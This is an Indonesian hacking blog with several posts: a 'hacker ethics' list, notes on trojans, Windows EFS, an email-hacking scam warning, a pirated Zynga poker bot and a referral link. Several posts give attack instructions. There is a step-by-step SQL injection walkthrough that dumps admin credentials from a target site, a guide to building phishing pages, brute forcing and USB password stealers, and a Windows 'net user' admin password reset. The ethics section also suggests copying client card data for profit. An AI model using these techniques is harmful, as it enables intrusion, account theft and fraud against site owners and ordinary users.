Friday, March 9, 2012

Mungkin bagi master bisa menambahkan disini.

Pertama sebelum belajar NgeHack kita belajar dulu ETIKA HACKER.Namun dengan jaman telah berkembang, aturan telah disepelekan, mereka lantas menjuluki dirinya sebagai seorang hacker. Pada saat ini mereka lebih banyak melakukan hacking/cracking demi mencapai publikasi masyarakat yang sangat besar. Mereka pada umumnya lupa bahwa terdapat etika² tersendiri di dalam dunia underground.

Etika Hacker:
Memiliki kemampuan mengakses komputer tampa batasan.
Semua informasi yang diberikan tidak boleh dipungut bayaran apapun. Tidak ada yang boleh disembunyikan, dan di tutup-tutupi.
Tidak percaya pada otoritas, artinya memperluas desentralisasi.
Tidak memakai identitas palsu alias asli, seperti nama samaran yang konyol², umur, posisi, dll.
Mampu berseni dikomputer
Komputer dapat mengubah hidup menjadi lebih baik.
Pekerjaan yang dilakukan semata-mata demi kebenaran informasi yang harus disebar luaskan.
Memegang teguh komitmen tidak membela dominasi ekonomi industri software tertentu.
Hacking adalah senjata mayoritas dalam perang melawan pelanggaran batas teknologi komputer.
Baik Hacking maupun Phreaking adalah satu²nya jalan lain untuk menyebarkan informasi pada masa agar tidak gagap dalam komputer.
Setelah itu ini adalah cara main hacker, dalam pengertian hacker bukan berarti membabi buta menyerang tampa berpikir:

Di atas segalanya, hormati pengetahuan & kebebasan informasi.
Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang di keamanan yang anda lihat. Seperti Bug, dll.
Jangan mengambil keuntungan yang tidak fair dari hack. Semata mata untuk kepuasan sendiri
Tidak mendistribusikan & mengumpulkan software bajakan. Tampa maksud tertentu
Tidak pernah mengambil resiko yang bodoh – selalu mengetahui kemampuan sendiri. Tudak brutal dalam melakukan hacking
Selalu bersedia untuk secara terbuka / bebas / gratis memberitahukan & mengajarkan berbagai informasi & metoda yang diperoleh secara cuma cuma, tampa pamrih
Tidak pernah meng-hack sebuah sistem untuk mencuri uang.
Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.
Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack. Keculai maksud tertentu
Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.

Hacker sejati akan selalu bertindak berlandaskan kode etik dan aturan main.
SeseOrang hacker adalah mereka yang dapat memasuki sebuah Sistem Informasi Akuntansi. Teknologi informasi yang meliputi komputer dan telekomunikasi memampukan tanpa diketahui oleh pemilik atau pengawas sistem komputerisasi tersebut. Seorang hacker pada umumnya tidak mengumumkan bahwa dia dapat menembus sistem keamanan tersebut, mereka (para hacker) selalu menghindari publikasi, dan pada umumnya hanya memberitahu pemilik ataupun pengawas sistem komputerisasi tersebut agar pemilik yang habis dibobolnya dapat memperbaiki sistem keamanan komputernya.

Hacking berarti mencari tahu kelemahan dalam sebuah sistem mapan dan mengeksploitasi mereka. Seorang hacker yang Fokus pada komputer adalah orang yang menemukan kelemahan dalam komputer dan memanfaatkan itu. Hacker mungkin didorong oleh banyak alasan, seperti keuntungan, protes, atau tantangan. Subkultur yang telah berkembang di sekitar hacker sering disebut sebagai tanah komputer tetapi sekarang sebuah komunitas terbuka. Sedangkan kegunaan lain dari kata Peretas (Hacker) ada yang tidak berkaitan dengan keamanan komputer, mereka jarang digunakan dalam konteks mainstream. Mereka tunduk pada kontroversi hacker berdiri definisi panjang tentang arti sebenarnya dari istilah hacker.

Dalam kontroversi ini, istilah hacker kembali oleh pemrogram komputer yang berpendapat bahwa seseorang yang namanya Peretas (Hacker) membobol komputer yang lebih baik disebut cracker, tidak membuat perbedaan antara penjahat komputer (Black hats) dan pakar keamanan komputer (White hats). Beberapa hacker topi putih mengklaim bahwa mereka juga layak judul hacker, Some white hat hackers claim that they also deserve the title hacker, and that only black hats should be called crackers.

Peretas memiliki konotasi negatif karena kesalahpahaman masyarakat akan perbedaan istilah tentang hacker dan cracker. Banyak orang memahami bahwa peretaslah yang mengakibatkan kerugian pihak tertentu seperti mengubah tampilan suatu situs web (defacing), menyisipkan kode-kode virus, dan lain², padahal mereka adalah cracker. Cracker-lah menggunakan celah² keamanan yang belum diperbaiki oleh pembuat perangkat lunak (bug) untuk menyusup dan merusak suatu sistem. Atas alasan ini biasanya para peretas dipahami dibagi menjadi dua golongan: White Hat Hackers, yakni hacker yang sebenarnya dan cracker yang sering disebut dengan istilah Black Hat Hackers.

Peretas putih atau White hat hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas yang secara etis menunjukkan suatu kelemahan dalam sebuah sistem komputer. White hat secara umum lebih memfokuskan aksinya kepada bagaimana melindungi sebuah sistem, dimana bertentangan dengan black hat yang lebih memfokuskan aksinya kepada bagaimana menerobos sistem tersebut. Topi putih atau peretas putih adalah pahlawan atau orang baik, terutama dalam bidang komputer, dimana ia menyebut etika hacker atau penetrasi penguji yang berfokus pada mengamankan dan melindungi IT sistem.

Peretas topi putih atau peretas suci, juga dikenal sebagai "Good Hacker," adalah ahli keamanan komputer, yang berspesialisasi dalam penetrasi pengujian, dan pengujian metodologi lain, untuk memastikan bahwa perusahaan sistem informasi yang aman. Pakar keamanan ini dapat memanfaatkan berbagai metode untuk melaksanakan uji coba mereka, termasuk rekayasa sosial taktik, penggunaan alat-alat hacking, dan upaya untuk menghindari keamanan untuk mendapatkan masuk ke daerah aman.

Seorang hacker harus ingat pada satu hal "DO NOT DAMAGE THE SYSTEM". Hal ini harus dicamkan oleh seorang hacker. Seorang hacker seperti yang dikatakan di atas, hanya memasuki suatu sistem, melihat² sistem, lalu memberitahu kepada pemilik atau pengawas sistem jaringan tersebut. Mereka yang disebut sebagai hacker sejati punya hati ini tidak pernah merusak ataupun merubah data pada sistem jaringan tersebut, walaupun mereka pada umumnya mempunyai minat dan punya kemampuan untuk merusak dan mengubah data tersebut, mereka hanya membaca data tersebut, mempelajari hal²nya, jika bermanfaat dicatat, jika tidak ditinggalkan.

Peretas (Hacker) adalah orang yang mempelajari, menganalisa, memodifikasi, menerobos masuk ke dalam komputer dan jaringan komputer, baik untuk keuntungan atau dimotivasi oleh tantangan.

Memang hal ini kelihatan membosankan bagi seorang pemula yang belajar menjadi hacker, dan kadang yang menjadi pertanyaan bagi seorang pemula adalah "Terus untungnya bagi saya ini apa?" Well, keuntungan yang anda dapatkan untuk ini adalah anda mendapatkan ilmu pengetahuan, seorang hacker tidak melakukan suatu hal hanya untuk demi kepentingan ataupun keuntungan pribadi.

Seseorang hacker selalu Fokus mempelajari hal² baru yang diharapkan dapat banyak ilmu pengetahuan. Kerusakan yang dilakukan oleh hacker - hacker baru biasanya adalah menghapus seluruh data pada sistem jaringan tersebut, dan merubah data yang berada pada di jaringan tersebut. Saya sebutkan salah satu etika hacking adalah : DO NOT DAMAGE THE SYSTEM (Tapi cukup copy saja file² yang berisi data client beserta transaksinya, guna mendapatkan keuntungan via cc number.

Itu saja post pertama, bisa disambung lagi …

Monday, May 23, 2011

Perangkat lunak bebas pemeliharaan sumber daya Win32 file executable Resource Hacker

Resource Hacker adalah perangkat lunak bebas yang digunakan untuk melihat, mengubah, menambah dan menghapus sumber daya dalam file executable Win32.
Dibangun kompiler sumber daya internal dan decompiler.

Resource Hacker dapat digunakan:

1. Melihat file eksekusi dan terkait Win32 Resources (*. exe, *. dll, *. cpl, *. ocx), disusun dan dekompilasi dalam format waktu.

2. Ekstrak (save) sumber daya ke file (*. res) format, sebagai biner, atau sebagai sumber anti-terjemahan disusun atas script atau gambar.
Ikon, bitmap, pointer, menu, dialog, tabel string, tabel pesan, akselerator, dan sumber daya Borland bentuk versi info dapat sepenuhnya decompiled format masing-masing, baik sebagai file gambar atau *. rc teks .

3. Modify (ganti) sumber daya file eksekusi.
sumber daya Image (ikon, kursor dan bitmaps) dapat menjadi file gambar yang sesuai (*. ico, *. cur, *. bmp), *. res file, atau bahkan lain penggantian file *. exe.
Dialog, menu, tabel string, akselerator, dan skrip pesan sumber daya tabel (dan Borland bentuk) dapat menggunakan editor sumber daya internal script akan diedit dan kompilasi ulang.
Sumber Daya dapat digantikan oleh file *. res selama sumber daya pengganti dan itu adalah tipe yang sama dan memiliki nama yang sama.

4. Tambah sumber daya baru ke file eksekusi.
Sebuah aplikasi untuk mendukung beberapa bahasa, atau menambahkan sebuah ikon kustom atau bitmap (logo perusahaan, dll) untuk dialog program.

5. Sumber daya Hapus. Kebanyakan kompiler menambahkan aplikasi tidak akan pernah menggunakan sumber daya ke dalam aplikasi. Hapus sumber daya yang tidak terpakai dapat mengurangi ukuran sebuah aplikasi.

Foto:
Agan klik gambarnya biar jadi jelas.

http://s12.sinaimg.cn/orignal/725eee7eta3d8fe67592b&690
Gambar lainnya. ---> Resource Hacker

Download: -----> Resourcehacker/

Mengenal Virus Trojan Horse, Cara Mencegah dan Menanggulangi

Virus Trojan atau Trojan Horse mungkin sudah pada sering dengar atau pernah melihat antivirus komputer kita mendeteksi virus yang diidentifikasi sebagai virus Trojan. Mungkin ada yang mengira trojan adalah nama suatu virus komputer layaknya seperti nama-nama virus komputer lain misalnya virus kangen, virus Brontok dan lain-lain.

Trojan Horse atau bisa disebut Trojan sebenarnya adalah suatu jenis/golongan virus bukan nama suatu virus. Istilah Trojan Horse diambil dari legenda Yunani Kuno yaitu kisah Trojan War atau Perang Troya/Troy.
Kisahnya begini, (ndongeng dulu) :

Alkisah Putra Mahkota Kerajaan Troya yang bernama Paris terlibat perselingkuhan dengan Helen istri pejabat di Yunani. Hal itu membuat pihak kerajaan Yunani marah dan menyerang kerajaan Troya. Namun benteng pertahanan Troya kuat sekali dikepung 10 tahun tidak juga menyerah.
Pasukan Yunani yang sudah putus asa akhirnya menggunakan taktik licik, mereka pura-pura meninggalkan kota Troya dan bersembunyi di balik bukit, namun mereka meninggalkan patung kuda besar dari kayu yang diisi dengan pasukan elit Yunani.
Penduduk Troya bersukaria mengetahui pasukan Yunani sudah mundur, dan patung kuda yang bagus peninggalan pasukan Yunani itu diarak masuk kota Troya.
Pada malam hari saat penduduk dan pasukan Troya terlelap maka pasukan elit di dalam patung kuda troya keluar, sebagian membukakan gerbang untuk pasukan Yunani yang bersembunyi di luar gerbang, sebagian menyerang obyek-obyek vital kerajaan Troya. Maka hancurlah kerajaan Troya.

Nah, karena ada virus komputer mempunyai karakter yang mirip kisah Kuda Troya/ Trojan Horse maka beberapa virus tersebut digolongkan menjadi virus Trojan Horse.

Virus Trojan adalah program yang terdiri dari 2 bagian yaitu: program yang disusupkan ke komputer korban dengan segala tipu daya, dan yang satunya program yang dijalankan komputer hacker.
Jika hacker berhasil menyusupkan program ke komputer korban, maka hacker bisa mengintai dan mengendalikan (me-remote) aktivitas komputer korban dari komputer hacker.

Virus Trojan sangat berbahaya bagi pengguna komputer yang tersambung jaringan komputer atau internet, karena bisa jadi hacker bisa mencuri data-data sensitif misalnya password email, internet banking, paypal, e-gold,kartu kredit dan lain-lain. Jika anda sering melakukan aktifitas keuangan online maka harus dipastikan bahwa komputer anda aman bebas dari virus.

Untuk mencegah dan menghapus virus Trojan pastikan anda memasang antivirus yang selalu ter-update, mengaktifkan Firewall baik bawaan dari Windows atau dari luar juga mengurangi resiko komputer kita diintai atau dikendalikan dari komputer lain.
Selalu waspadalah jika komputer anda mengalami sesuatu kejanggalan, seandainya antivirus tidak mampu menanggulangi virus, format saja komputer dan install ulang sistem operasi dan sofware-sofwarenya. Hindari penggunaan sofware ilegal/bajakan karena sering tanpa kita sadari software itu disusupi virus Trojan.

Demikian tips dari saya semoga berguna.

Fasilitas untuk menyandi dari Windows

Microsoft Windows ternyata menyediakan fasilitas untuk menyandi (enkripsi) file yang disimpan dalam harddisk secara instan. Fasilitas yang disebut EFS atau Encrypting File System hanya terdapat didalam Windows Vista versi Business, Enterprise dan Ultimate, Windows XP versi Professional serta Windows 2000.

Windows Vista versi Starter, Home Basic dan Home Premium hanya menyediakan fasilitas untuk membuka sandinya saja (dekripsi). Artinya adalah kita dapat membuka file yang disandi oleh EFS namun tidak dapat menyandi file. Sedangkan Windows XP versi Home malah tidak dilengkapi dengan fasilitas EFS.

EFS sangat mudah digunakan untuk mengacak isi sebuah file atau folder dengan hanya memerlukan sebuah password-protected account. Untuk menggunakan EFS dalam partisi harddisk, harddisk tersebut harus dalam format NTFS.

Karena hanya menggunakan sebuah password-protected account diawal membuka Windows-nya saja, menjadikan EFS tidak sekuat sistem penyandian lainnya yang menyandi file/folder berbasis algoritma dan hardware.

Terlepas dari kekuarangan tersebut, EFS tentunya masih lumayan untuk dapat memproteksi file-file yang dirasa “privasi” saat komputer kita digunakan oleh orang lain (yang tentunya dengan username lain) sehingga tidak dengan mudah dapat seketika terlihat.

Namun untuk menjaga kerahasiaan data-data penting, cara yang paling ampuh adalah dengan menyandi data yang disimpan ataupun didistribusikan tersebut dengan teknik menyandi yang terbaik yaitu penyandian berbasis algoritma dan hardware dengan kunci yang handal.

Teknik menyandi dengan EFS


Untuk menyandi file atau folder dengan EFS, klik kanan di file/folder tersebut, klik properties, klik advanced…, klik untuk memberi tanda contreng pada kotak dengan tulisan Encrypt contents to secure data, klik OK dua kali.

Bila yang akan disandi adalah file, akan muncul kotak dialog yang isinya menyatakan :

anda telah memilih untuk meng-encrypt file, namun file tersebut tersimpan dalam folder yang tidak di-encrypt, bila file tersebut dimodifikasi / diubah, file akan ter-decrypt secara otomatis.

Disarankan untuk meng-encrypt file beserta foldernya. File yang di-save ke dalam folder itu (yang telah di-encrypt) akan otomatis ter-encrypt juga.

Kemudian kita diminta memilih apakah akan meng-encrypt filenya saja atau beserta foldernya.

Bila yang disandi adalah foldernya maka akan muncul kotak dialog yang isinya menyatakan :

anda telah memilih encrypt (atau decrypt), kemudian ditanyakan apakah akan menerapkan encrypt (atau decrypt) tersebut pada folder tersebut saja atau folder, subfolders dan files-nya.

Kita dapat menyandi beberapa folder / file sekaligus dengan terlebih dahulu memilih folder / file yang akan disandi kemudian baru klik kanan, klik properties dst.

File atau folder yang telah disandi akan ditandai dengan warna hijau. Namun bila kita tidak ingin orang lain mengetahui ada file yang disandi (karena berwarna hijau) maka buka Explorer (untuk Windows XP) kemudian klik Tools, klik Folder Option, klik View. Dalam kotak Advanced settings hilangkan tanda contreng pada bagian Show encrypted or compressed NTFS files in color. Klik OK.

Lima dari jenis TROJAN HORSE dan tehnik serangannya

Software jahat dan anti software jahat terus berkembang saling adu kuat. Ketika serangan virus, trojan horse dan malware lain dapat diatasi oleh sebuah sistem pengamanan, serangan berikutnya sebagai respon terhadap sistem pengamanan tersebut datang lagi dengan kemampuan/kelihaian yang lebih tinggi.

Berikut 5 jenis trojan horse yang tehnik serangannya dengan cara mengelabui sistem pengamanan :

1. Glieder Trojan

Trojan ini seolah mengatakan “jangan hiraukan saya, saya disini hanya untuk mengistirahatkan komputer ini.” padahal sesungguhnya komputer sedang memasukkan sebuah program pengintai.

Glieder trojan menggunakan proses penularan bertingkat, dimana tahap pertamanya adalah sebuah program malware kecil akan berubah secara terus menerus, sehingga program anti-virus yang terpasang dalam PC tidak akan mengenalnya sebagai malware.

Begitu glieder trojan terinstal dalam PC, program ini akan berusaha menghilangkan kemampuan sistem pengamanan yang terpasang, baru setelah itu melakukan aktifitas jahatnya seperti memindahkan atau mencuri data penting, atau aktifitas lainnya sesuai keinginan penyerang.

2. Gozi Trojan

Websites dapat menggunakan secure cocket layer (SSL) untuk menyandi dan mengamanankan data penting dan sensitif seperti on-line banking atau transaksi on-line. Ciri-ciri website yang menggunakan SSL adalah adanya gambar gembok di address bar-nya.

Gozi trojan seolah mengatakan “website dikunci dan disandi ? no, problem !” dan dia akan menghindari pengamanan ini (SSL) dengan cara mengelabui OS Windows, sehingga seakan-akan dia adalah bagian dari proses SSL.

Yang terjadi adalah data meninggalkan browser melalui gozi trojan sebelum data tersebut disandikan dan dikirimkan keluar PC menuju network. Program jahat ini memang tidak seperti trojan pada umumnya, dia masuk sampai ke operating system dengan mengelabui layered service providers (LSPs).

3. SpamThru Trojan

Program jahat ini berlaku seolah-oleh sebuah program anti-virus tambahan, sehingga dapat dikatakan “malware yang melakukan scanning malware dalam PC”. Bila PC memasang anti-virus baru yang lebih baik, dia akan memblok malware ini agar tidak bisa melakukan up-date yang dapat mengubah dirinya menjadi malware lain.

4. SpyAgent Trojan

Program ini bermain di area penyandian file dalam windows, yaitu ketika kita melakukan penyandian dengan fasilitas yang disediakan oleh windows. SpyAgent ini memposisikan dirinya sebagai user account tingkat administrator, dan menggunakan account tersebut untuk menyandi file-file. Program anti-virus yang terpasang tidak akan menduga adanya file yang sudah disusupi program jahat.

5. Jowspry Trojan

Jowspry trojan mengelabui PC dengan dengan tehnik topeng (masquerader), seolah-olah sebuah program yang memang sudah dikenal dan diakui oleh PC, yaitu windows up-date.

Program ini akan melakukan koneksi seperti background intelligent transfer service yang digunakan oleh program windows up-date, sehingga tidak ditangkal oleh program firewall yang terpasang dalam PC. Seolah mengatakan “hai firewall, saya windows up-date, jangan khawatir la yaw!”.

Untuk mengantisipasi kehadiran trojan-trojan tersebut agar tidak bersarang dalam PC atau tidak memberi kesempatan pada trojan untuk beraksi perlu diantisipasi :

- selalu up-date windows dan program aplikasinya;

- usahakan tidak membuka attachement atau mengklik link dalam e-mail yang tidak jelas; dan

- gunakan selalu program anti-virus yang baik.

Tuesday, May 3, 2011

E-mail Password Hacking

Sebagian besar orang yang meminta saya untuk mengajarkan cara termudah hacking password email. Bahkan yang paling banyak mengajukan pertanyaan pada hacking adalah beberapa atau cara lain yang berkaitan dengan hacking password email. Bahkan jika Anda memiliki pertanyaan serupa di benak Anda inilah jawabannya. Pertama-tama jangan tertipu oleh apa yang disebut "cara termudah untuk hack password email" yang diberikan pada banyak situs scam. Here's the scam prosedur. Metode ini hacking password tidak pernah bekerja.





--->>LANGKAH pertama - Log in ke account Anda (yahoo, hotmail, gmail dll)
--->> LANGKAH 2 - Klik di Tulis
--->> Langkah 3 - Dalam tipe subjek persis sebagai berikut

Password Retrieval

--->> LANGKAH 4 - Dalam alamat tepat untuk mengetik alamat email berikut

retrieve_mypass@yahoo.com (untuk yahoo)
send_mypass@hotmail.com (untuk hotmail)
googlepass_reset@gmail.com (untuk gmail)

--->> LANGKAH 4 - Badan mail

  • Pada baris pertama ketik alamat email Anda sendiri dan dalam baris berikutnya sandi Anda.

CATATAN: Langkah ini adalah yang paling penting, jadi melakukannya persis seperti yang diinstruksikan.

Heres contoh

myemailid@yahoo.com
iamafool

Berikan persis 4 baris kesenjangan setelah ini.
Sekarang ketik alamat email orang yang Anda inginkan hack.
Pada baris berikutnya ketik kode berikut persis seperti yang diberikan di bawah ini

** yyb67hhfy @ # yssyhhdiuhhyahoo.comsi * 8?? "(untuk yahoo)

** yyb67hhfy @ # yssyhhdiuhhhotmail.comsi * 8?? "(untuk hotmail)

** yyb67hhfy @ # yssyhhdiuhhgoogle.comsi * 8?? "(untuk gmail)

--->> LANGKAH 5 - Sekarang Kirim mail dan periksa inbox Anda setelah beberapa jam. Para korban password dikirimkan kepada Anda oleh resetting password server.This adalah bug utama di sebagian besar host seperti yahoo, gmail dll Berikut server bingung dan mengirim password korban.

HABIS BAGIAN.

Pernah pernah mencoba trik ini. Jika mencoba Anda pasti longgar sandi Anda sendiri. Mari kita lihat bagaimana surat di atas bekerja.

Pertama dari semua "Untuk mengatasi" dari mail tidak lain adalah ID dari orang yang telah menulis trik ini. Email ini tidak memiliki nilai khusus, itu tidak lain daripada biasa alamat email milik pengguna seperti Anda, bukan alamat email server. Jadi anda hanya surat Anda sendiri ID dan password kepada orang asing dalam upaya untuk hack password lain. Semua aturan-aturan lain seperti garis kesenjangan, kode dll omong kosong, hanya diberikan untuk membuat Anda percaya itu benar. Jadi intinya adalah tidak pernah percaya / coba hacks ini. Metode ini disebut Social Engineering di mana orang-orang yang dibuat untuk mail mereka sendiri username dan password pada hacker ID. Jadi di sini orang-orang tertipu dan lepas mendapatkan password mereka dalam usahanya untuk hack password lain.

Sebenarnya hacking password cara melibatkan penggunaan suatu program keylogger. The keylogger adalah program siluman yang menyembunyikan keberadaan itu tapi diam-diam semua rekaman yang meliputi bahkan keystrokes password. Cara lain hacking password melibatkan penggunaan trojan, Membuat halaman login palsu dll trik ini dibahas secara rinci dalam pos Hacking An Email Account. Ini adalah posting yang meliputi rincian yang lengkap email hacking.

Sunday, April 17, 2011

OK~Apa itu VirtaPay?




Yang perlu diingat, Virtapay adalah sebuah situs layanan e-currency yang pada saat ini masih dalam tahap proses pre-launching dan belum membuka layanan e-currency-nya untuk umum. Virtapay baru berencana launching secara resmi akhir april atau awal mei tahun 2011 nanti.



Benarkah dolar yang tersimpan dalam account Virtapay kita sama sekali tidak berharga? Ya, untuk saat ini. Tapi jika nanti Virtapay telah resmi membuka layanannya untuk publik, tentu saja kita bisa melakukan jual beli Virtapay baik ke rekening E-currency lain atau pun ke bank lokal. Pada saatnya nanti tentu akan bermunculan layanan agen tukar Virtapay, dan itu bisa jadi peluang baik, karena terbuka kesempatan untuk siapa saja yang mau menjadi agen changer. Demikian juga jika Virtapay resmi menjadi mata uang elektronik, kemungkinan akan ada situs bisnis online yang mau menerima dolar Virtapay sebagai alat tukar.

Wikipedia mendefinisikan E-currency sebagai: mata uang elektronik yang digunakan untuk keperluan transaksi elektronik sebagai pengganti mata uang konvensional. Istilah lain yang sering digunakan untuk e-currency yaitu:e-money, electronic cash, digital cash, digital currency, payment processor, dll. Mata uang yang umum digunakan yaitu Dolar Amerika. Ada pula diantaranya yang menggunakan Euro, Foundsterling atau logam mulia seperti emas dan perak. Layanan e-currency dikelola oleh sebuah jaringan situs di internet dengan nama yang berbeda-beda. Misalnya: Paypal, Liberty Reserve, E-Gold, C-Gold, WebMoney, AlertPay, dan masih banyak lagi situs penyedia e-currency.

Seperti layaknya mata uang dalam kehidupan sehari-hari (mata uang konvensional), e-currency bisa digunakan untuk berbagai keperluan khususnya menyangkut pembayaran transaksi di dunia maya. Umumnya orang menggunakan e-currency untuk mempermudah pembayaran saat melakukan aktivitas yang membutuhkan pertukaran mata uang, misalnya saat berbelanja di toko online, membeli item tertentu di sebuah situs, transfer uang ke rekening pihak lain, tabungan, transaksi pada bisnis online dan sebagainya. Keberadaan e-currency telah diakui sejak lama dan diterima sebagai mata uang yang sah pada banyak situs. Hal ini karena kemudahannya yang membuat pengguna lebih tertarik memakai e-currency dibanding cara lain untuk bertransaksi online.

http://www.virtapay.com/r/mastervirta

Tuesday, April 5, 2011

TEXAS HOLDEM ZYNGA POKER BOT Penipu bangsat..

==================================
Liberty Bot Deluxe For Zynga Poker 2.1
==================================

Liberty Bot Deluxe Untuk Zynga Poker adalah sebuah bot (robot) program untuk bermain Zynga Poker secara otomatis. Didalam badan program ini telah tertanam dalam berbagai mesin dan AI (Kecerdasan buatan) untuk menyederhanakan dan mendapatkan kemenangan hingga 100% (asumsi bila menggunakan mode God Of Gambler).

Software ini mempunyai 4 engine bot dengan kemampuan yang berbeda. Normal, Professional, High Defense, dan God Of Gambler mode. Baca petunjuk detilnya pada software atau klik saja tombol help.

Berbeda dengan software bot lainnya. Hanya Liberty Bot Deluxe yang mampu memberikan jaminan "All Cards Revealed" dikarenakan software ini memiliki teknologi yang mampu membaca streaming kartu (Hanya bila menggunakan mode God Of Gambler) dan mampu menampilkan kartu seluruh pemain pada Panel Cards.

Bagi yang menyukai game Zynga Poker, silahkan di download filenya (sudah termasuk video tutorial didalamnya) dibawah ini:

Link download :

http://www.mediafire.com/?6zpljz5d9ye3d3u


Download kemudian ubah menjadi LibertySetup.rar. Buka dengan menggunakan winrar.

NB :Software ini mempunyai 4 engine bot dengan kemampuan yang berbeda :

- Normal ( Chips Min to Accept + $ 5M )
- Professional ( Chips Min to Accept + $ 10M )
- High Defense ( Chips Min to Accept + $ 25M )
- God Of Gambler mode ( Chips Min to Accept + $ 50M )

Baca petunjuk detail nya pada software atau Liat Video Tutorial nya Gan.
Apabila Anda kesulitan mengartikan petunjuk penggunaannya yang masih berbahasa inggris, Anda bisa menggunakan Google Translate untuk menterjemahkannya. Dan meski program ini masih Trial Version, namun jangan khawatir, serial number program ini juga telah disertakan didalam file. Tinggal masukkan dan Anda akan memperoleh versi full version.
Selamat bermain!

Saturday, March 26, 2011

TuT SQL Injection

1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100

2. Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.

Contoh :
http://www.target.com/berita.php?id=100'

Atau
http://www.target.com/berita.php?id=-100

4. Maka akan muncul pesan error...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near '''
at line 1" Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya...
Disini kita akan menggunakan perintah order by

Contoh :
http://www.target.com/berita.php?id=100+order+by+1%2F*

Hohoho...apalagi itu "/*" ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah aja...

Kalo "+" sebagai penghubung perintah...

6. Nah sampe sini langsung dah nyobain satu2...

http://www.target.com/berita.php?id=100+order+by+1%2F* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2%2F* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3%2F* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4%2F* (jangan nyerah)

Sampai muncul error...
Misalkan errornya disini...

http://www.target.com/berita.php?id=100+order+by+10%2F*

Berarti yang kita ambil adalah "9"
http://www.target.com/berita.php?id=100+order+by+9%2F*

7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION

Contoh :
http://www.target.com/news.php?id=100+union+select+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2F*

Trus perhatikan angka berapa yang keluar (Kayak togel aja... ;p)

8. Misalnya angka hoki yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version"

http://www.target.com/news.php?id=100+union+select+1%2C2%2Cversion (),4,5,6,7,8,9/*

Atau
http://www.target.com/news.ph....*

9. Nah kalo versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database...

Contoh :
http://www.target.com/berita.....*

Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya...Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain...ya maklum lah baru belajar...Hehehe...

Misalnya yang lo liat adalah table "admin"

Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya...

Contoh:
http://www.target.com/berita.....*

Misalnya kolom yang keluar adalah "password" dan "username"
Langsung aja kita liat isinya...

Contoh :
http://www.target.com/news.ph....*

dan

http://www.target.com/news.ph....*

Bisa diliat dah username ama passwordnya...Tinggal login...Cari yang asik terus...Terserah Anda... :D

Oke met di coba?

Cara Mudah Hack Password

- Phishing

Di bidang keamanan komputer, phishing adalah proses pidana penipuan dari mencoba untuk mendapatkan informasi sensitif seperti username, password dan rincian kartu kredit dengan menyamar sebagai entitas dapat dipercaya dalam komunikasi elektronik. Komunikasi yang mengaku dari populer situs web sosial, situs lelang, prosesor pembayaran online atau administrator IT biasanya digunakan untuk menarik publik tidak menaruh curiga.

Bagaimana cara kerjanya: Anda dapat mendownload / membuat replika dari website yang ingin Anda phish dan simpan sebagai HTML. Bila Anda telah selesai dengan itu, Anda harus menemukan cara untuk meng-upload HTML. Anda dapat menggunakan situs gratis hosting atau website seperti Blogspot, Piczo, dll Ketika korban masuk email dan password pada kolom login, menyelamatkan orang-situs phishing rincian login dan mereka akan secara otomatis dikirimkan kepada Anda melalui surat.

- Bruteforcing

Ini adalah metode agak berdebat. Aku tidak pernah secara pribadi mencoba tetapi, membaca berbagai situs dan forum hacking. Dikatakan bahwa Hotmail account dapat bruteforced. Dalam Bruteforcing, Anda harus mendapatkan wordlist - yang berisi berbagai kata dan kata-kata yang mencoba keluar sebagai password untuk account hotmail korban. Secara umum, untuk situs lain seperti Gmail, Yahoo, dll, Anda memiliki kesempatan terbatas login account dan sekali bahwa jumlah kemungkinan berakhir, Anda tidak diizinkan untuk mencoba untuk login. Mekanisme ini membantu dalam menghindari serangan bruteforce terhadap account email. Jadi, itu berdebat untuk mengatakan bahwa password account Hotmail dapat hacked (benar-benar retak) oleh Bruteforcing.

Perangkat lunak Bruteforcing paling terkenal digunakan adalah Brutus. Tapi, ingat, untuk hotmail account password hacking oleh Bruteforcing, Anda harus memiliki wordlist kualitas yang baik yang dapat diperoleh melalui Google.

- Social engineering

Social engineering adalah metode mengambil password atau menjawab pertanyaan keamanan hanya akan queering dengan korban. Anda harus sangat berhati-hati saat menggunakan ini sebagai korban tidak harus menyadari tujuan Anda. Hanya bertanya hati-hati menggunakan logika Anda.

- USB Pencuri

Seperti yang kita semua tahu, Windows menyimpan sebagian besar password yang digunakan setiap hari, termasuk password instant messenger seperti MSN, Yahoo, AOL, Windows messenger dll Seiring dengan ini, Windows juga menyimpan password dari Outlook Express, SMTP, POP , account FTP dan password otomatis-lengkap banyak browser seperti IE dan Firefox. Terdapat banyak alat bantu untuk memulihkan passswords ini dari tempat mereka disimpan. Menggunakan alat-alat dan USB flashdisk Anda dapat membuat rootkit sendiri untuk hack password dari / Komputer kuliah teman Anda. Saya membaca artikel Hack Sandi Bagaimana Menggunakan USB Pen Drive untuk informasi lebih lanjut.

Postingan di ambil dari Forum Diskusi Hacker Liar Facebook.

Mengganti password Admin Windows xphanya dengan CMD

1.Pertama lo buka run

2.Terus ketik cmd
3.Abis itu ketik net user (account user yang ada disitu) *

